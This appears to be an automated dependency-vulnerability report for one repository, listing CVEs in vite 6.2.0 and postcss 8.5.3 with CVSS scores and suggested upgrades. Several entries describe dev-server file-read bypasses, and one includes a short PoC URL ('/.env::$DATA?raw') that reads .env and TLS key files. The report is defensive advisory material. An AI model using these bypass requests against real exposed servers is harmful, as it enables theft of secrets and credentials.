- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-06-15
Fix Resolution: https://github.com/vitejs/vite.git - v8.0.16,https://github.com/vitejs/vite.git - v6.4.3,https://github.com/vitejs/launch-editor.git - v2.14.1,https://github.com/vitejs/vite.git - v7.3.5
⛑️ Automatic Remediation will be attempted for this issue.
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Summary The contents of files that are specified by ""server.fs.deny"" (https://vite.dev/config/server-options#server-fs-deny) can be returned to the browser on Windows. Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using "--host" or ""server.host" config option" (https://vitejs.dev/config/server-options.html#server-host)) - the sensitive file exists in the allowed directories specified by ""server.fs.allow"" (https://vite.dev/config/server-options#server-fs-allow) - either of: - the sensitive file exists in an NTFS volume - the dev server is running on Windows and the sensitive file exists in a volume that 8.3 short name generation is enabled (it is enabled by default on system volumes) Details Vite’s dev server denies direct access to sensitive files through "server.fs.deny", including entries such as ".env", ".env.", and ".{crt,pem}". However, on Windows, the deny logic does not correctly normalize NTFS ADS path forms before access checks are applied. Because of this, requests such as "/.env::$DATA?raw" are treated as allowed paths, while Windows resolves them to the original file's default data stream. Similar to that, Windows allows accessing a file using a different name with the 8.3 short name compatibility feature. Vite did not reject accessing files via them. PoC $ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev Access via browser at "http://localhost:5173/.env::$DATA?raw"
Example expected result: - "/.env::$DATA?raw" returns the contents of ".env" - "/tls.pem::$DATA?raw" returns the contents of "tls.pem"
Publish Date: 2026-06-15
URL: CVE-2026-53571
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-06-15
Fix Resolution: https://github.com/vitejs/vite.git - v8.0.16,https://github.com/vitejs/vite.git - v7.3.5,https://github.com/vitejs/vite.git - v6.4.3
⛑️ Automatic Remediation will be attempted for this issue.
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for JavaScript. From 6.0.0 to before 6.4.2, 7.3.2, and 8.0.5, if it is possible to connect to the Vite dev server’s WebSocket without an Origin header, an attacker can invoke fetchModule via the custom WebSocket event vite:invoke and combine file://... with ?raw (or ?inline) to retrieve the contents of arbitrary files on the server as a JavaScript string (e.g., export default "..."). The access control enforced in the HTTP request path (such as server.fs.allow) is not applied to this WebSocket-based execution path. This vulnerability is fixed in 6.4.2, 7.3.2, and 8.0.5.
Publish Date: 2026-04-07
URL: CVE-2026-39363
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-p9ff-h696-f583
Release Date: 2026-04-07
Fix Resolution: vite-plus - 0.1.16,https://github.com/vitejs/vite.git - v7.3.2,https://github.com/vitejs/vite.git - v6.4.2,https://github.com/vitejs/vite.git - v8.0.5
⛑️ Automatic Remediation will be attempted for this issue.
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for JavaScript. In versions from 2.9.18 to before 3.0.0, 3.2.9 to before 4.0.0, 4.5.3 to before 5.0.0, 5.2.6 to before 5.4.21, 6.0.0 to before 6.4.1, 7.0.0 to before 7.0.8, and 7.1.0 to before 7.1.11, files denied by server.fs.deny were sent if the URL ended with \ when the dev server is running on Windows. Only apps explicitly exposing the Vite dev server to the network and running the dev server on Windows were affected. This issue has been patched in versions 5.4.21, 6.4.1, 7.0.8, and 7.1.11.
Publish Date: 2025-10-20
URL: CVE-2025-62522
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-93m4-6634-74q7
Release Date: 2025-10-20
Fix Resolution: vite - 7.0.8,vite - 5.4.21,vite - 7.1.11,vite - 6.4.1
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for javascript. Prior to versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14, the contents of files in the project root that are denied by a file matching pattern can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. Only files that are under project root and are denied by a file matching pattern can be bypassed. "server.fs.deny" can contain patterns matching against files (by default it includes .env, .env.*, *.{crt,pem} as such patterns). These patterns were able to bypass for files under "root" by using a combination of slash and dot (/.). This issue has been patched in versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14.
Publish Date: 2025-05-01
URL: CVE-2025-46565
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-859w-5945-r5v3
Release Date: 2025-05-01
Fix Resolution: 6.2.7
⛑️ Automatic Remediation will be attempted for this issue.
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for javascript. Prior to 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5.13, the contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun. HTTP 1.1 spec (RFC 9112) does not allow # in request-target. Although an attacker can send such a request. For those requests with an invalid request-line (it includes request-target), the spec recommends to reject them with 400 or 301. The same can be said for HTTP 2. On Node and Bun, those requests are not rejected internally and is passed to the user land. For those requests, the value of http.IncomingMessage.url contains #. Vite assumed req.url won't contain # when checking server.fs.deny, allowing those kinds of requests to bypass the check. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) and running the Vite dev server on runtimes that are not Deno (e.g. Node, Bun) are affected. This vulnerability is fixed in 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5.13.
Publish Date: 2025-04-10
URL: CVE-2025-32395
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-356w-63v5-8wf4
Release Date: 2025-04-10
Fix Resolution: 6.2.6
⛑️ Automatic Remediation will be attempted for this issue.
Vulnerable Library - postcss-8.5.3.tgz
Tool for transforming styles with JS plugins
Library home page: https://registry.npmjs.org/postcss/-/postcss-8.5.3.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
PostCSS takes a CSS file and provides an API to analyze and modify its rules by transforming the rules into an Abstract Syntax Tree. Versions prior to 8.5.10 do not escape "</style>" sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML "<style>" tags, "</style>" in CSS values breaks out of the style context, enabling XSS. Version 8.5.10 fixes the issue.
Publish Date: 2026-04-24
URL: CVE-2026-41305
CVSS 3 Score Details (6.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-qx2v-qp2m-jg93
Release Date: 2026-04-24
Fix Resolution (postcss): 8.5.10
Direct dependency fix Resolution (vite): 6.2.1
⛑️ Automatic Remediation will be attempted for this issue.
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for JavaScript. From 6.0.0 to before 6.4.2, 7.3.2, and 8.0.5, the dev server’s handling of .map requests for optimized dependencies resolves file paths and calls readFile without restricting ../ segments in the URL. As a result, it is possible to bypass the server.fs.strict allow list and retrieve .map files located outside the project root, provided they can be parsed as valid source map JSON. This vulnerability is fixed in 6.4.2, 7.3.2, and 8.0.5.
Publish Date: 2026-04-07
URL: CVE-2026-39365
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-4w7w-66w2-5vf9
Release Date: 2026-04-07
Fix Resolution: 6.4.2
⛑️ Automatic Remediation will be attempted for this issue.
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for javascript. The contents of arbitrary files can be returned to the browser. By adding ?.svg with ?.wasm?init or with sec-fetch-dest: script header, the server.fs.deny restriction was able to bypass. This bypass is only possible if the file is smaller than build.assetsInlineLimit (default: 4kB) and when using Vite 6.0+. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. This vulnerability is fixed in 4.5.12, 5.4.17, 6.0.14, 6.1.4, and 6.2.5.
Publish Date: 2025-04-03
URL: CVE-2025-31486
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-xcj6-pq6g-qj4x
Release Date: 2025-04-03
Fix Resolution: 6.2.5
⛑️ Automatic Remediation will be attempted for this issue.
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for javascript. Vite exposes content of non-allowed files using ?inline&import or ?raw?import. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. This vulnerability is fixed in 6.2.4, 6.1.3, 6.0.13, 5.4.16, and 4.5.11.
Publish Date: 2025-03-31
URL: CVE-2025-31125
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-4r4m-qw57-chr8
Release Date: 2025-03-31
Fix Resolution: 6.2.4
⛑️ Automatic Remediation will be attempted for this issue.
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. "@fs" denies access to files outside of Vite serving allow list. Adding "?raw??" or "?import&raw??" to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as "?" are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using "--host" or "server.host" config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
Publish Date: 2025-03-24
URL: CVE-2025-30208
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2025-03-24
Fix Resolution: 6.2.3
⛑️ Automatic Remediation will be attempted for this issue.
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20, any HTML files on the machine were served regardless of the "server.fs" settings. Only apps that explicitly expose the Vite dev server to the network (using --host or server.host config option) and use "appType: 'spa'" (default) or "appType: 'mpa'" are affected. This vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served. Versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20 fix the issue.
Publish Date: 2025-09-08
URL: CVE-2025-58752
CVSS 3 Score Details (4.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-jqfw-vq24-v9c3
Release Date: 2025-09-08
Fix Resolution: 6.3.6
⛑️ Automatic Remediation will be attempted for this issue.
Vulnerable Library - vite-6.2.0.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-6.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: b57a0a5c4765847d004ff2f68061c6699a2e65d5
Found in base branch: main
Vulnerability Details
Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20, files starting with the same name with the public directory were served bypassing the "server.fs" settings. Only apps that explicitly expose the Vite dev server to the network (using --host or "server.host" config option), use the public directory feature (enabled by default), and have a symlink in the public directory are affected. Versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20 fix the issue.
Publish Date: 2025-09-08
URL: CVE-2025-58751
CVSS 3 Score Details (4.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-g4jq-h2w9-997c
Release Date: 2025-09-08
Fix Resolution: 6.3.6
⛑️ Automatic Remediation will be attempted for this issue.
⛑️Automatic Remediation will be attempted for this issue.